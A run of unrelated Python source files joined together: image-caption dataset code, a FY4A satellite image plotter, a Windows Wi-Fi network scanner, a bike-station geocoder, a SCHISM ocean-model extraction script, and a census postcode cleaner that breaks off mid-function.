img = cv2.resize(img, (299, 299)).astype('float32')
img = preprocess_input(img) # preprocess for model
tensor = self.__transform(img)
return {
'image': tensor,
'file_name': file_name
}
class ImageTensor2CaptionDataset(torch.utils.data.Dataset):
"""Image to Caption mapping dataset.
Args:
word2idx (dict): word to index mapping vocab.
max_len (int): maximum allowed length of a caption string.
root_dir (string): directory with all the images.
json_file (string): path to the json file with annotations.
"""
def __init__(self, word2idx, max_len=20,
root_dir='data/train2014',
json_file='captions_train2014.json'):
self._max_len = max_len
self.__word2idx = word2idx
self.__root_dir = root_dir
self.__image_paths = list(filter(lambda x: x.endswith('.jpg'), os.listdir(root_dir)))
self.__tensor_paths = list(filter(lambda x: x.endswith('.pt'), os.listdir(root_dir)))
assert len(self.__image_paths) == len(self.__tensor_paths), 'conversion to tensors buggy'
self.__captions = get_captions(
f'data/captions_train-val2014/annotations/{json_file}',
self.__image_paths
)
def __len__(self):
return len(self.__tensor_paths)
def __getitem__(self, idx):
tensor_name = self.__tensor_paths[idx]
image_tensor = torch.load(f"{self.__root_dir}/{tensor_name}").cpu().detach()
ridx = np.random.randint(5)
caption = self.__captions[idx][ridx]
caption = seq_to_tensor(caption, self.__word2idx, max_len=self._max_len)
return {
'image': image_tensor,
'caption': caption
}
def image_center_crop(img):
""" Center crop images.
Args:
-----
img (numpy.ndarray): Image array to crop.
Returns:
--------
numpy.ndarray:
"""
h, w = img.shape[0], img.shape[1]
pad_left = 0
pad_right = 0
pad_top = 0
pad_bottom = 0
if h > w:
diff = h - w
pad_top = diff - diff // 2
pad_bottom = diff // 2
else:
diff = w - h
pad_left = diff - diff // 2
pad_right = diff // 2
return img[pad_top: h - pad_bottom, pad_left: w - pad_right, :]
def encode_and_save(root_dir, cnn_encoder=get_cnn_encoder()):
batch_size = 12
dataset = Image2TensorDataset(root_dir=root_dir)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=8,
pin_memory=True)
bmod = len(dataset) % batch_size
bdiv = len(dataset) // batch_size
total_iters = bdiv if bmod == 0 else bdiv + 1
for _, batch in tqdm(enumerate(dataloader), total=total_iters, leave=True,
desc=f'Encoding images into embeddings and saving tensors to files: {root_dir}'):
images, file_names = batch['image'], batch['file_name']
tensors = encode(images.cuda(), cnn_encoder=cnn_encoder).cpu().detach()
for i, file_name in enumerate(file_names):
torch.save(tensors[i], f"{root_dir}/{file_name.replace('.jpg', '.pt')}")
def main():
cnn_encoder = get_cnn_encoder()
if torch.cuda.is_available():
cnn_encoder = cnn_encoder.cuda()
paths = ['data/train2014', 'data/val2014']
for path in paths[1:]:
encode_and_save(path, cnn_encoder=cnn_encoder)
if __name__ == "__main__":
main()
|
<reponame>jovi521/swsw
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.basemap import Basemap
import sys
import os
import time
from fy4a import FY4A_AGRI_L1
def create_img(file_path, geo_range, save_dir):
'''
file_path:需要解析的文件路径
geo_range:需要裁剪的区域范围和粒度,格式:最小纬度,最大纬度,最小经度,最大经度,粒度 例如:10, 54, 70, 140, 0.1
save_path:保存路径
'''
# 获得文件名
filename = file_path.split('\\')[-1]
# 从文件名中获得时间
start_time = filename.split('_')[-4]
# 将世界时转化为北京时
time_array = time.strptime(start_time, "%Y%m%d%H%M%S")
time_stamp = int(time.mktime(time_array)) + 8 * 3600
time_array = time.localtime(time_stamp)
other_style_time = time.strftime('%Y%m%d%H%M%S', time_array)
yyyyMMdd = other_style_time[0:8]
# 卫星类型
satellite_type = 'FY4A'
# 通道号
channel_number = 'Channel02'
# 读取文件,获得fy4a对象
fy4a_agri_l1 = FY4A_AGRI_L1(file_path)
# 选择通道和区域
fy4a_agri_l1.extract('Channel02', geo_range)
# 获得通道对象
channel12 = fy4a_agri_l1.channels['Channel02']
# 绘图
# 设置图片大小和dpi
# plt.subplot(1, 1, 1)
plt.figure(figsize=(10, 8), dpi=400)
lat_S, lat_N, lon_W, lon_E, step = eval(geo_range)
channel12 = np.array(channel12)
channel12 = np.flip(channel12, axis=0)
Basemap(projection='merc', llcrnrlat=lat_S, urcrnrlat=lat_N, \
llcrnrlon=lon_W, urcrnrlon=lon_E, lat_ts=5, resolution='c')
x = np.arange(lon_W, lon_E + 0.1, 0.1)
y = np.arange(lat_S, lat_N + 0.1, 0.1)
xx, yy = np.meshgrid(x, y)
plt.contourf(xx, yy, channel12, cmap='gray')
# plt.contourf(xx, yy, channel12)
# 去除边框
plt.axis('off')
img_name = '{}{}{}{}{}{}'.format('C002', '_', other_style_time, '_', satellite_type, '.png')
save_dir = '{}{}{}{}{}{}'.format(save_dir, satellite_type, '/', yyyyMMdd, '/', channel_number.upper())
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_path = '{}{}{}'.format(save_dir, '/', img_name)
plt.savefig(save_path, transparent=True, bbox_inches='tight', pad_inches=0)
if __name__ == '__main__':
file_path = sys.argv[1]
geo_range = sys.argv[2]
save_path = sys.argv[3]
# file_path = 'D:/Z_SATE_C_BAWX_20201217062328_P_FY4A-_AGRI--_N_DISK_1047E_L2-_LSE-_MULT_NOM_20201217060000_20201217061459_012KM_V0001.NC'
# color_dict = 'D:/color_dict.txt'
# geo_range = '10,54,70,140,0.1'
# save_path = 'D:/China.png'
# file_path = 'D:\\Data\\Z_SATE_C_BAWX_20210130084157_P_FY4A-_AGRI--_N_REGC_1047E_L1-_FDI-_MULT_NOM_20210130083418_20210130083835_4000M_V0001.HDF'
# geo_range = '10,54,70,140,0.1'
# save_path = 'D:/Data/satellite_parse/'
create_img(file_path,geo_range,save_path) |
"""Allows user to collect data in a consistent manner."""
import re
import subprocess
from pylates import utils
class PlatformNetworkManager(object):
"""Base class for platforms to implement.
These classes implement methods to interact with the network and
collect data.
"""
def __init__(self):
pass
def gather_networks_info(self, method):
pass
class WindowsNetworkManager(PlatformNetworkManager):
"""Implement the Windows platform interaction with the network."""
CMD_NETSH = ["netsh", "wlan", "show", "network", "mode=bssid"]
def __init__(self):
super(WindowsNetworkManager).__init__()
self.mac_address = self.get_interface_mac_address()
def get_interface_mac_address(self):
result_raw = subprocess.check_output(['getmac', '/v']).decode('utf-8')
return self._parse_getmac_v_output(result_raw)
def gather_networks_info(self, method):
# Switch cmd below to change how data is collected
network_list_raw = self._execute_gather_method(method)
points_data = self._convert_command_output_to_dicts(
method, network_list_raw)
return points_data
def _parse_getmac_v_output(self, getmac_output):
lines = getmac_output.splitlines()
wifi_mac_regex = re.compile(r'^Wi-Fi.*([a-fA-F0-9]{2}[:|\-]?){6}.*$')
result = ''
for line in lines:
match = re.search(wifi_mac_regex, line)
if match:
result = utils.find_mac_address(line)
return result
def _execute_gather_method(self, method):
"""Use a specific method to gather data regarding the networks."""
if method == self.CMD_NETSH:
return subprocess.check_output(method).decode('utf-8')
def _convert_command_output_to_dicts(self, cmd, netsh_output):
"""Convert the 'netsh wlan show network "mode=bssid" output to dicts."""
lines = netsh_output.splitlines()
ssid_dicts = []
if cmd == self.CMD_NETSH:
ssid_reg = re.compile(r'^SSID \d* :.*$')
ssid_locs = []
ssid_infos = []
# Divide SSIDs
for line_no in range(0, len(lines)):
if ssid_reg.match(lines[line_no]):
ssid_locs.append(line_no)
if len(ssid_locs) > 1:
ssid_infos.append(lines[ssid_locs[-2]:ssid_locs[-1]])
if len(ssid_locs) >= 1:
ssid_infos.append(lines[ssid_locs[-1]:])
for ssid_info in ssid_infos:
ssid_dict = {'bssid': []}
for line in ssid_info:
if not line:
break
k, v = line.split(':', 1)
k = k.strip()
v = v.strip()
if re.match(r'SSID \d+', k):
ssid_dict['ssid'] = v
elif k == 'Network type':
ssid_dict['network_type'] = v
elif k == 'Authentication':
ssid_dict['authentication'] = v
elif k == 'Encryption':
ssid_dict['encryption'] = v
elif re.match(r'BSSID \d+', k):
ssid_dict['bssid'].append({'name': v})
elif k == 'Signal':
v = int(v.replace('%', ''))
ssid_dict['bssid'][-1]['signal'] = v
elif k == 'Radio type':
ssid_dict['bssid'][-1]['radio_type'] = v
elif k == 'Channel':
ssid_dict['bssid'][-1]['channel'] = v
elif k == 'Basic rates (Mbps)':
v = v.split(' ')
v = [float(x) for x in v]
ssid_dict['bssid'][-1]['basic_rates'] = v
elif k == 'Other rates (Mbps)':
v = v.split(' ')
v = [float(x) for x in v]
ssid_dict['bssid'][-1]['other_rates'] = v
ssid_dicts.append(ssid_dict)
return ssid_dicts
|
<gh_stars>1-10
"""Functions having to do with physical location
"""
import math
import requests
from divvy import config
def get_lat_lon(addr_string):
"""Convert an address to lat/lon
Use the Google Maps Geocoding API to convert an
address string (e.g. 123 North State Street)
to a latitude and longitude. The Google API will
also return a standarized address string.
It's pretty good at spelling correction if the street
name gets garbled by the speech-to-text engine.
Parameters
----------
addr_string: str
String address, e.g. "123 North State Street, Chicago, IL".
The zip code can help disambiguate, but generally
isn't necessary. It's strongly advised to have
either the city or the zip: otherwise, Google will
guess what city you mean, often incorrectly.
Returns
-------
(lat, lon, addr): (float, float, str)
Latitude (as a float), longitude (as a float), and the
standardized form of the input address
See Also
--------
https://developers.google.com/maps/documentation/geocoding/
"""
addr_string = addr_string.replace(' ', '+')
query = 'json?address=' + addr_string + '&key=' + config.maps_api_key
resp = requests.get(config.maps_api + query)
if resp.status_code != 200:
raise RuntimeError('Error getting map coordinates: ' + resp.status)
lat = resp.json()['results'][0]['geometry']['location']['lat']
lon = resp.json()['results'][0]['geometry']['location']['lng']
addr = resp.json()['results'][0]['formatted_address']
return lat, lon, addr
def distance(lat1, lon1, lat2, lon2):
"""Calculate the great circle distance between two locations
Assumes the locations are on Earth.
Assumes a spherical Earth with radius equal to Earth's average radius.
Parameters
----------
lat1, lon1 : float, float
Origin longitude and latitude in decimal degrees
lat2, lon2 : float, float
Destination longitude and latitude in decimal degrees
Returns
-------
float
Distance between the two points in meters
Notes
-----
Uses the haversine formula:
a = sin^2(\Delta \phi /2) + cos(\phi_1) * cos(\phi_2) * sin^2(\Delta \lambda /2)
c = 2 * atan2( \sqrt(a), \sqrt(1-a))
d = R * c
where \phi is latitude, \lambda is longitude, R is earth's radius (mean radius = 6,371 km)
"""
lon1, lat1 = math.radians(lon1), math.radians(lat1)
lon2, lat2 = math.radians(lon2), math.radians(lat2)
a = (math.sin((lat2 - lat1) / 2) ** 2 +
math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = 6371000 * c
return d
def station_from_lat_lon(lat, lon, stations, n_nearest=3):
"""Find the nearest station(s) to a given location
Parameters
----------
lat : float or str
Latitude
lon : float or str
Longitude
stations : list of dict
JSON following the Divvy "stationBeanList" schema.
Each entry in the list must have
"lat" and "lon" keys.
n_nearest : int, optional
Return this many stations, ordered from nearest to furthest
Returns
-------
list of dict
A list of `n_nearest` Divvy stations
"""
lat, lon = float(lat), float(lon)
distances = [(distance(lat, lon, st['lat'], st['lon']), st)
for st in stations
if (st['is_renting'] and st['is_installed'])]
distances = sorted(distances)
return [pair[1] for pair in distances[:n_nearest]]
|
<reponame>wzhengui/pylibs
#!/usr/bin/env python3
'''
Extract SCHISM variable values at (x,y,z) from station.bp.
1). work for both uncombined and combined SCHISM outputs
2). can extract multiple variables at the same time
3). can work in interactive or batch mode
4). output in ACSII or *npz format
'''
from pylib import *
import time
#-----------------------------------------------------------------------------
#Input
#-----------------------------------------------------------------------------
run='/sciclone/data10/wangzg/fabm_dev/RUN12' #run dir containing outputs
stacks=[1,146] #stacks of schout_*.nc
sname='RUN12/cosine' #name for results
svars=['elev','salt','temp','COS_1'] #SCHISM variables to be extracted
rvars=['elev','salt','temp','NO3'] #rename variable names
bpfile='/sciclone/data10/wangzg/fabm_dev/RUN12/station.bp' #file name of station.bp
icmb=0 #icmb=0: work on uncombined; icmb=1: work on combined schout_*.nc
ifs=1 #ifs=1: depth relative to surface; ifs=0: fixed depth (z coordiante)
fmt=0 #fmt=0: output as *.npz format; fmt=1: output as ASCII
#optional
grid='/sciclone/data10/wangzg/fabm_dev/RUN12/grid.npz' #saved grid info, to speed up; use hgrid.gr3 and vgrid.in if not exist
igather=1 #igather=1: save data on each rank,then combine; igather=0: use MPI
#resource requst
walltime='00:10:00'
qnode='x5672'; nnode=2; ppn=8 #hurricane, ppn=8
#qnode='bora'; nnode=2; ppn=20 #bora, ppn=20
#qnode='vortex'; nnode=2; ppn=12 #vortex, ppn=12
#qnode='femto'; nnode=2; ppn=12 #femto,ppn=32
#qnode='potomac'; nnode=4; ppn=8 #ches, ppn=12
#qnode='james'; nnode=5; ppn=20 #james, ppn=20
#qnode='skylake'; nnode=2; ppn=36 #viz3,skylake, ppn=36
#qnode='haswell'; nnode=2; ppn=2 #viz3,haswell, ppn=24,or 28
#qnode='frontera'; nnode=1; ppn=56 #frontera, ppn=56
qname='flex' #partition name (needed for frontera)
jname='Rd_{}'.format(os.path.basename(run)) #job name
ibatch=1; scrout='screen.out'; bdir=os.path.abspath(os.path.curdir)
#-----------------------------------------------------------------------------
#on front node: 1). submit jobs first (qsub), 2) running parallel jobs (mpirun)
#-----------------------------------------------------------------------------
if ibatch==0: os.environ['job_on_node']='1'; os.environ['bdir']=bdir #run locally
if os.getenv('job_on_node')==None:
if os.getenv('param')==None: fmt=0; bcode=sys.argv[0]
if os.getenv('param')!=None: fmt=1; bdir,bcode=os.getenv('param').split(); os.chdir(bdir)
scode=get_hpc_command(bcode,bdir,jname,qnode,nnode,ppn,walltime,scrout,fmt=fmt,qname=qname)
print(scode); os.system(scode); os._exit(0)
#-----------------------------------------------------------------------------
#on computation node
#-----------------------------------------------------------------------------
bdir=os.getenv('bdir'); os.chdir(bdir) #enter working dir
comm=MPI.COMM_WORLD; nproc=comm.Get_size(); myrank=comm.Get_rank()
if myrank==0: t0=time.time()
#-----------------------------------------------------------------------------
#do MPI work on each core
#-----------------------------------------------------------------------------
nproc=max(min(nproc,int(diff(stacks))),1)
if myrank==0:
sdir=os.path.dirname(sname)
if (not os.path.exists(sdir)) and sdir!='': os.mkdir(sdir)
#-----------------------------------------------------------------------------
#compute grid and bpfile information
#-----------------------------------------------------------------------------
#read grid information
t00=time.time()
if os.path.exists(grid):
gd=loadz(grid).hgrid; vd=loadz(grid).vgrid
else:
gd=read_schism_hgrid('{}/hgrid.gr3'.format(run))
vd=read_schism_vgrid('{}/vgrid.in'.format(run))
#compute area coordinate for stations
bp=read_schism_bpfile(bpfile)
bp.ie,bp.ip,bp.acor=gd.compute_acor(c_[bp.x,bp.y]); #bp.ne,bp.np=gd.ne,gd.np
bp.dp=gd.dp[bp.ip]; bp.dp0=(bp.dp*bp.acor).sum(axis=1)
if vd.ivcor==1: bp.sigma=vd.sigma[bp.ip]; bp.kbp=vd.kbp[bp.ip]; vd.sigma=None
#check pts inside grid
sindn=nonzero(bp.ie==-1)[0]
if len(sindn)!=0: sys.exit('pts outside of domain: {}'.format(c_[bp.x[sindn],bp.y[sindn]]))
dt00=time.time()-t00; print('finish reading grid info: time={:0.2f}s, myrank={}'.format(dt00,myrank)); sys.stdout.flush()
#read subdomain info
if icmb==0:
t00=time.time()
subs=gd.read_prop('{}/outputs/global_to_local.prop'.format(run)).astype('int')[bp.ie]
isub=unique(subs); sbps=[]; sindes=[]
for i, isubi in enumerate(isub):
sinde=nonzero(subs==isubi)[0] #elem index of stations
#build the iegl and ipgl
T=read_schism_local_to_global('{}/outputs/local_to_global_{}'.format(run,srank(isubi,run)))
iegl=dict(zip(T.ielg,arange(T.ne))); ipgl=dict(zip(T.iplg,arange(T.np)))
#compute subdomain ie,ip and acor,dp,z,sigma,kbp
sbp=zdata(); #sbp.ne,sbp.np=T.ne,T.np
sbp.ie=array([iegl[k] for k in bp.ie[sinde]])
sbp.ip=array([[ipgl[k] for k in n ] for n in bp.ip[sinde]])
sbp.acor=bp.acor[sinde]; sbp.dp=bp.dp[sinde]; sbp.z=bp.z[sinde]; sbp.nsta=len(sinde)
if vd.ivcor==1: sbp.sigma=bp.sigma[sinde]; sbp.kbp=bp.kbp[sinde]
sbps.append(sbp); sindes.extend(sinde)
sinds=argsort(array(sindes)) #indices to sort station order
dt00=time.time()-t00; print('finish reading subdomain info: time={:0.2f}s, myrank={}'.format(dt00,myrank)); sys.stdout.flush()
else:
isub=[None]; sbps=[bp]; sinds=arange(bp.nsta)
#-----------------------------------------------------------------------------
#extract data on each processor
#-----------------------------------------------------------------------------
#distribute jobs
istacks=[i for i in arange(stacks[0],stacks[1]+1) if i%nproc==myrank]
#initilize data capsule
S=zdata(); S.time=[]; #S.bp=bp
for i in svars: exec('S.{}=[]'.format(i))
#extract (x,y,z) value for each stack and each subdomain
for n,istack in enumerate(istacks):
t00=time.time(); Si=zdata()
for m in svars: exec('Si.{}=[]'.format(m))
for m,isubi in enumerate(isub):
#open schout_*.nc
if icmb==0: fname='{}/outputs/schout_{}_{}.nc'.format(run,srank(isubi,run),istack)
if icmb==1: fname='{}/outputs/schout_{}.nc'.format(run,istack)
if (not os.path.exists(fname)) and icmb==0: sys.exit('not exist: {}'.format(fname))
C=ReadNC(fname,1); sbp=sbps[m]
#read time
mti=array(C.variables['time'][:])/86400; nt=len(mti);
if m==0: S.time.extend(mti)
#extract elevation -> compute zcor -> vertical interploate
eis=[]; k1s=[]; k2s=[]; rats=[]
for i in arange(nt):
eii=array(C.variables['elev'][i][sbp.ip]) if ('elev' in C.variables) else 0*sbp.dp
ei=(eii*sbp.acor).sum(axis=1); eis.append(ei)
if len(svars)==1 and svars[0]=='elev': continue
#compute zcor
zii=[]; kbpii=[]
for k in arange(3):
if vd.ivcor==1: ziii=vd.compute_zcor(sbp.dp[:,k],eii[:,k],sigma=sbp.sigma[:,k,:],kbp=sbp.kbp[:,k],method=1)
if vd.ivcor==2: ziii,kbpiii=vd.compute_zcor(sbp.dp[:,k],eii[:,k],method=1,ifix=1); kbpii.append(kbpiii)
zii.append(ziii)
zi=(array(zii)*sbp.acor.T[...,None]).sum(axis=0).T
if vd.ivcor==2: sbp.kbp=array(kbpii).T.astype('int')
#station depth
mzi=sbp.z.copy()
if ifs==1: mzi=-mzi+ei
#interpolation in the vertical
k1=ones(sbp.nsta)*nan; k2=ones(sbp.nsta)*nan; rat=ones(sbp.nsta)*nan
fp=mzi<=zi[0]; k1[fp]=0; k2[fp]=0; rat[fp]=0 #bottom
fp=mzi>=zi[-1]; k1[fp]=(vd.nvrt-1); k2[fp]=(vd.nvrt-1); rat[fp]=1 #surface
for k in arange(vd.nvrt-1):
fp=(mzi>=zi[k])*(mzi<zi[k+1])
k1[fp]=k; k2[fp]=k+1
rat[fp]=(mzi[fp]-zi[k][fp])/(zi[k+1][fp]-zi[k][fp])
if sum(isnan(r_[k1,k2,rat]))!=0: sys.exit('check vertical interpolation')
k1s.append(k1); k2s.append(k2); rats.append(rat)
eis=array(eis); k1s=array(k1s).astype('int'); k2s=array(k2s).astype('int'); rats=array(rats)
if len(svars)==1 and svars[0]=='elev': Si.elev.extend(array(eis).T); continue
#compute (x,y,z) for each variables
Sii=zdata()
for mm, svar in enumerate(svars):
exec('Sii.{}=[]'.format(svar))
ndim=C.variables[svar].ndim; dim=C.variables[svar].shape; dimname=C.variables[svar].dimensions
data=[]
for i in arange(nt):
k1=k1s[i]; k2=k2s[i]; rat=rats[i]
#get variable values
if ('nSCHISM_hgrid_node' in dimname):
trii=array(C.variables[svar][i][sbp.ip])
elif ('nSCHISM_hgrid_face' in dimname):
trii=array(C.variables[svar][i][sbp.ie])
else:
sys.exit('unknown variable format: {},{}'.format(svar,dim))
#extend values in the bottom: dim[2] is nvrt
if ('nSCHISM_vgrid_layers' in dimname):
sindp=arange(sbp.nsta)
if ('nSCHISM_hgrid_node' in dimname):
for nn in arange(3):
kbp=sbp.kbp[:,nn]; btri=trii[sindp,nn,kbp]
for k in arange(vd.nvrt):
fp=k<kbp
trii[sindp[fp],nn,k]=btri[fp]
elif ('nSCHISM_hgrid_face' in dimname):
kbe=sbp.kbp.max(axis=1); btri=trii[sindp,kbe]
for k in arange(vd.nvrt):
fp=k<kbe
trii[sindp[fp],k]=btri[fp]
else:
sys.exit('unknown variable format: {},{}'.format(svar,dim))
#horizontal interp
if ('nSCHISM_hgrid_node' in dimname):
if ndim==2: tri=(trii*sbp.acor).sum(axis=1)
if ndim==3: tri=(trii*sbp.acor[...,None]).sum(axis=1)
if ndim==4: tri=(trii*sbp.acor[...,None,None]).sum(axis=1); rat=rat[:,None]
else:
tri=trii
#vertical interp
if ('nSCHISM_vgrid_layers' in dimname):
datai=(tri[sindp,k1]*(1-rat)+tri[sindp,k2]*rat)
else:
datai=tri
data.append(datai)
#save result from each variables
exec('ds=[1,0,*arange(2,{}-1)]; Sii.{}.extend(array(data).transpose(ds))'.format(ndim,svar))
#save result form subdomain
for i in svars: exec('Si.{}.extend(Sii.{})'.format(i,i))
#combine istack results
for i in svars: exec('ds=[1,0,*arange(2,array(Si.{}).ndim)]; S.{}.extend(array(Si.{})[sinds].transpose(ds))'.format(i,i,i))
dt00=time.time()-t00; print('finish reading stack={}; time={:0.2f}s, myrank={}'.format(istack,dt00,myrank)); sys.stdout.flush()
S.time=array(S.time); ['S.{}=array(S.{}).astype("float32")'.format(i,i) for i in svars]
#-----------------------------------------------------------------------------
#combine results from all ranks
#-----------------------------------------------------------------------------
if igather==1 and myrank<nproc: savez('{}_{}'.format(sname,myrank),S)
comm.Barrier()
if igather==0: sdata=comm.gather(S,root=0)
if igather==1 and myrank==0: sdata=[loadz('{}_{}.npz'.format(sname,i)) for i in arange(nproc)]
if myrank==0:
S=zdata(); S.time=[]; S.bp=bp
for i in rvars: exec('S.{}=[]'.format(i))
for i in arange(nproc):
Si=sdata[i]; S.time.extend(Si.time)
for m,[svar,rvar] in enumerate(zip(svars,rvars)): exec('S.{}.extend(Si.{})'.format(rvar,svar))
#save data
S.time=array(S.time); sind=argsort(S.time); S.time=S.time[sind]
for i in rvars: exec('ds=[1,0,*arange(2,array(S.{}).ndim)]; S.{}=array(S.{})[sind].transpose(ds)'.format(i,i,i))
if fmt==0:
savez('{}'.format(sname),S)
else:
#write out ASCII file
for i in rvars: exec('ds=[1,*arange(2,array(S.{}).ndim),0]; S.{}=array(S.{}).transpose(ds)'.format(i,i,i))
fid=open('{}.dat'.format(sname),'w+')
for i,ti in enumerate(S.time):
datai=[]
for rvar in rvars: exec('datai.extend(S.{}[{}].ravel())'.format(rvar,i))
fid.write(('{:12.6f}'+' {:10.6f}'*len(datai)+'\n').format(ti,*datai))
fid.close()
if igather==1: [os.remove('{}_{}.npz'.format(sname,i)) for i in arange(nproc)] #clean
#-----------------------------------------------------------------------------
#finish MPI jobs
#-----------------------------------------------------------------------------
comm.Barrier()
if myrank==0: dt=time.time()-t0; print('total time used: {} s'.format(dt)); sys.stdout.flush()
sys.exit(0) if qnode in ['bora'] else os._exit(0)
|
<reponame>the-scouts/incognita
"""Merges ONS postcode data with census data
Outputs a file which is contains the original census data, a postcode validity
check, and the merged data.
The output fields are those in the census and ONS data, and the additional
fields 'postcode_is_valid' and 'clean_postcode'.
"""
import re
import pandas as pd
from incognita.data import scout_census
from incognita.logger import logger
CLEAN_POSTCODE_LABEL = "clean_postcode"
def merge_with_postcode_directory(census_data: pd.DataFrame, ons_pd_data: pd.DataFrame, ons_fields_data_types: dict[str, list[str]]) -> pd.DataFrame:
logger.info("Cleaning the postcodes")
_clean_and_verify_postcode(census_data)
# attempt to fix invalid postcodes
logger.info("Adding ONS postcode directory data to Census and outputting")
data = _try_fix_invalid_postcodes(census_data, ons_pd_data.index)
# fully merge the data
logger.info("Merging data")
data = pd.merge(data, ons_pd_data, how="left", left_on="clean_postcode", right_index=True, sort=False)
# fill unmerged rows with default values
logger.info("filling unmerged rows")
data = _fill_unmerged_rows(data, ons_fields_data_types)
return data
def _clean_and_verify_postcode(census_data: pd.DataFrame) -> None:
"""Cleans postcode data and inserts clean postcodes and validity check
Cleans postcode data from passed table and index
Gets index of postcode column, and inserts new columns after postcode column
Args:
census_data: table of data with a postcode column
"""
# Gets the index of the postcode column, and increments as insertion is from the left.
# Columns must be inserted in number order otherwise it wont't make sense
postcode_column = scout_census.column_labels.POSTCODE # heading of the postcode column in the table
postcode_column_index = census_data.columns.get_loc(postcode_column) # scout_census.column_labels.POSTCODE
cleaned_postcode_index = postcode_column_index + 1
valid_postcode_index = postcode_column_index + 2
# Sets the labels for the columns to be inserted
valid_postcode_label = scout_census.column_labels.VALID_POSTCODE
logger.info("Cleaning postcodes")
cleaned_postcode_column = _postcode_cleaner(census_data[postcode_column])
logger.info("Inserting columns")
census_data.insert(cleaned_postcode_index, CLEAN_POSTCODE_LABEL, cleaned_postcode_column)
census_data.insert(valid_postcode_index, valid_postcode_label, float("NaN"))
def _postcode_cleaner(postcode: pd.Series) -> pd.Series:
"""Cleans postcode to ONS postcode directory format.
Args:
postcode: pandas series of postcodes
Returns:
Cleaned postcode
"""
# Regular expression to remove whitespace, non-alphanumeric (keep shifted numbers)
regex_clean = re.compile(r'[\s+]|[^a-zA-Z\d!"£$%^&*()]')
# Remove any whitespace and most non-alphanumeric chars
# Convert input to uppercase (ONS Postcode Directory uses upper case)
# Pads length as we use the 7 long version from the Postcode Directory
postcode = postcode.str.replace(regex_clean, "").str.upper().apply(lambda single_postcode: _pad_to_seven(single_postcode))
# Replaces shifted numbers with their number equivalents
postcode = (
postcode.str.replace("!", "1", regex=False)
.str.replace('"', "2", regex=False)
.str.replace("£", "3", regex=False)
.str.replace("$", "4", regex=False)
.str.replace("%", "5", regex=False)
.str.replace("^", "6", regex=False)
.str.replace("&", "7", regex=False)
.str.replace("*", "8", regex=False)
.str.replace("(", "9", regex=False)
.str.replace(")", "0", regex=False)
)
# TODO: add macOS shift -> numbers conversion
return postcode
def _pad_to_seven(single_postcode): # r'(.*?(?=.{3}$))(.{3}$)' (potential regex)
"""Pad postcode strings
If length of postcode is 6 or 5 then insert 1 or 2 spaces.
6 first as more common to speed up execution
"""
if single_postcode == single_postcode: # filters out NaNs
length = len(single_postcode)
if length == 6 or length == 5:
single_postcode = single_postcode[:-3] + " " * (7 - length) + single_postcode[-3:]
return single_postcode
def _try_fix_invalid_postcodes(census_data: pd.DataFrame, all_valid_postcodes: pd.Index) -> pd.DataFrame:
"""Uses various methods attempting to provide every record with a valid postcode
Currently only implemented for sections with youth membership.
TODO: implement for all entity types
Methodology:
- If section has an invalid postcode in 2017 or 2018, use 2019's if valid (all are valid or missing in 2019)
- If section has no valid postcodes, use most common (mode) postcode from sections in group in that year, then try successive years
- If group or district has no valid postcode in 2010-2016, use following years (e.g. if 2010 not valid, try 2011, 12, 13 etc.)
Args:
census_data: Dataframe of census data including invalid postcodes
all_valid_postcodes: All valid postcodes from the ONS Postcode Directory
Returns:
modified data table with more correct postcodes
"""
logger.info("filling postcodes in sections with invalid postcodes")
# Helper variables to store field headings for often used fields
section_id_label = scout_census.column_labels.id.COMPASS
group_id_label = scout_census.column_labels.id.GROUP
district_id_label = scout_census.column_labels.id.DISTRICT
# Lists of entity types to match against in constructing section records tables
group_section_types = scout_census.TYPES_GROUP
district_section_types = scout_census.TYPES_DISTRICT
section_types = group_section_types | district_section_types
pre_2017_types = {"Group", "District"}
# Columns to use in constructing the MultiIndex. Larger groups go first towards smaller
index_cols = [district_id_label, group_id_label, section_id_label, scout_census.column_labels.CENSUS_ID]
# Find which postcodes are valid
census_data[scout_census.column_labels.VALID_POSTCODE] = census_data[CLEAN_POSTCODE_LABEL].isin(all_valid_postcodes)
# Sets a MultiIndex on the data table to enable fast searching and querying for data
census_data = census_data.set_index(index_cols, drop=False)
census_data = _run_postcode_fix_step(census_data, all_valid_postcodes, "section", "latest Census", section_types, section_id_label, 2)
census_data = _run_postcode_fix_step(census_data, all_valid_postcodes, "group-section", "same group", group_section_types, group_id_label, 1)
census_data = _run_postcode_fix_step(census_data, all_valid_postcodes, "district-section", "same district", district_section_types, district_id_label, 0)
census_data = _run_postcode_fix_step(census_data, all_valid_postcodes, "pre 2017", "same entity", pre_2017_types, section_id_label, 2)
# Undo the changes made in this method by removing the MultiIndex and
# removing the merge test column
census_data = census_data.reset_index(drop=True)
return census_data
def _fill_unmerged_rows(census_data: pd.DataFrame, fields_data_types: dict) -> pd.DataFrame:
"""Fills rows that have not merged with default values
Fills all passed fields in rows where there has been no data merged
Fills categorical fields with scout_census.DEFAULT_VALUE and numerical fields with 0
Args:
census_data: DataFrame with census data
fields_data_types: dict of data types containing lists of fields
Returns:
dataframe with filled values
"""
row_has_merged = scout_census.column_labels.VALID_POSTCODE # column label for column with booleans of if the merge was successful
for field in fields_data_types["categorical"]:
if scout_census.DEFAULT_VALUE not in census_data[field].cat.categories:
census_data[field] = census_data[field].cat.add_categories([scout_census.DEFAULT_VALUE])
census_data.loc[~census_data[row_has_merged], field] = scout_census.DEFAULT_VALUE
for field in fields_data_types["numeric"]:
census_data.loc[~census_data[row_has_merged], field] = 0
return census_data
def _run_postcode_fix_step(
data: pd.DataFrame, all_valid_postcodes: pd.Index, invalid_type: str, fill_from: str, entity_types: set[str], column_label: str, index_level: int
) -> pd.DataFrame:
"""Runs postcode fixer for given data and parameters.
Method:
Gets all records with ID from given column and index level, then clears the indexing
Returns the first row's postcode. As the index is sorted, this will return the earliest correct year.
TODO change to use modal result instead of first (If section has no valid postcodes, use most common
(modal) postcode from sections in group in that year, then try successive years)
Args:
data: Census data
all_valid_postcodes: Index of all valid postcodes in the ONS postcode directory
invalid_type: Which type of issue are we fixing (for log message)
fill_from: Where are we pulling valid postcodes from (for log message)
entity_types: Entity types to filter the fixing on (e.g. Colony, Group, Network, District)
column_label: Name of the index level being used
index_level: Level of the MultiIndex to filter on
Returns:
Updated census data
"""
